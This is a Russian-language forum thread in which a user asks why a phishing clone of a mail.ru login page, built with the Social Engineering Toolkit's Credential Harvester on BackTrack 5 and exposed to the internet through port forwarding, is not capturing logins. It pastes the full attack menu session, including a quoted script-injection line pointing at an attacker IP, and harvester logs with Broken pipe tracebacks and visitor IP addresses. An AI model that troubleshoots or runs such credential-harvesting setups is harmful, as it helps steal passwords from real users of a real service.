Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Social Engineering Toolkit (web site clone), Социальная инженерия,клонирование сайта error!
 
Использую Social Engineering Toolkit (set) ,а именно  Website Attack Vectors.Сделал проброс портов,захожу через анонимайзер через внешний IP адресс, для testa ввожу логин с паролем (данные login,pass неприходят)  и получаю вот такое http://s46.radikal.ru/i112/1111/d5/3b0b757d7809.jpg  , http://s017.radikal.ru/i419/1111/9e/77bf23215077.jpg  Подскажите как можно решить проблему,стоит О.С Backtrack5 R1.Тестирую с сайтом _http://e.mail.ru/cgi-bin/login,ведь как-то раньше всё работало,что может быть непойму.

Цитата
Select from the menu:

  1) Spear-Phishing Attack Vectors
  2) Website Attack Vectors
  3) Infectious Media Generator
  4) Create a Payload and Listener
  5) Mass Mailer Attack
  6) Arduino-Based Attack Vector
  7) SMS Spoofing Attack Vector
  8) Wireless Access Point Attack Vector
  9) Third Party Modules

 99) Return back to the main menu.

set> 2

The Web Attack module is  a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.

The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.

The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.

The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

  1) Java Applet Attack Method
  2) Metasploit Browser Exploit Method
  3) Credential Harvester Attack Method
  4) Tabnabbing Attack Method
  5) Man Left in the Middle Attack Method
  6) Web Jacking Attack Method
  7) Multi-Attack Web Method
  8) Victim Web Profiler
  9) Create or import a CodeSigning Certificate

 99) Return to Main Menu

set:webattack>3

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
 
  1) Web Templates
  2) Site Cloner
  3) Custom Import

 99) Return to Webattack Menu

set:webattack>1
[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.2

 1. Java Required
 2. Gmail
 3. Google
 4. Facebook
 5. Twitter
 6. Mail

set:webattack> Select a template:6

[*] Cloning the website: http://otvet.mail.ru/question/67183537/                                                              
[*] This could take a little bit...

The best way to use this attack is if username and password form                                                              
fields are available. Regardless, this captures all POSTs on a website.                                                      
[*] I have read the above message. [*]

Press {return} to continue.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

IP.xx.xxx.xxx - - [25/Nov/2011 16:35:24] "GET / HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('217.69.132.213', 39321)
Traceback (most recent call last):
 File "/usr/lib/python2.6/SocketServer.py", line 281, in _handle_request_noblock
   self.process_request(request, client_address)
 File "/usr/lib/python2.6/SocketServer.py", line 307, in process_request
   self.finish_request(request, client_address)
 File "/usr/lib/python2.6/SocketServer.py", line 320, in finish_request
   self.RequestHandlerClass(request, client_address, self)
 File "/usr/lib/python2.6/SocketServer.py", line 615, in __init__
   self.handle()
 File "/usr/lib/python2.6/BaseHTTPServer.py", line 329, in handle
   self.handle_one_request()
 File "/usr/lib/python2.6/BaseHTTPServer.py", line 323, in handle_one_request
   method()
 File "src/webattack/harvester/harvester.py", line 177, in do_GET
   self.wfile.write(line)
 File "/usr/lib/python2.6/socket.py", line 300, in write
   self.flush()
 File "/usr/lib/python2.6/socket.py", line 286, in flush
   self._sock.sendall(buffer)
 File "<string>", line 1, in sendall
error: [Errno 32] Broken pipe
----------------------------------------
pppoe.xx-xx-xxx-xx.dynamic.murmansk.avangarddsl.ru - - [25/Nov/2011 16:54:29] "GET / HTTP/1.0" 200 -
ip.xx.xx.xx - - [25/Nov/2011 17:05:34] "GET / HTTP/1.0" 200 -
----------------------------------------
Exception happened during processing of request from ('223.27.169.50', 55982)
Traceback (most recent call last):
 File "/usr/lib/python2.6/SocketServer.py", line 281, in _handle_request_noblock
   self.process_request(request, client_address)
 File "/usr/lib/python2.6/SocketServer.py", line 307, in process_request
   self.finish_request(request, client_address)
 File "/usr/lib/python2.6/SocketServer.py", line 320, in finish_request
   self.RequestHandlerClass(request, client_address, self)
 File "/usr/lib/python2.6/SocketServer.py", line 615, in __init__
   self.handle()
 File "/usr/lib/python2.6/BaseHTTPServer.py", line 329, in handle
   self.handle_one_request()
 File "/usr/lib/python2.6/BaseHTTPServer.py", line 323, in handle_one_request
   method()
 File "src/webattack/harvester/harvester.py", line 177, in do_GET
   self.wfile.write(line)
 File "/usr/lib/python2.6/socket.py", line 300, in write
   self.flush()
 File "/usr/lib/python2.6/socket.py", line 286, in flush
   self._sock.sendall(buffer)
 File "<string>", line 1, in sendall
error: [Errno 32] Broken pipe

----------------------------------------
Изменено: Alex Ivanov - 25.11.2011 15:22:09
 
Что никто ничего подсказать неможет......
Страницы: 1
Читают тему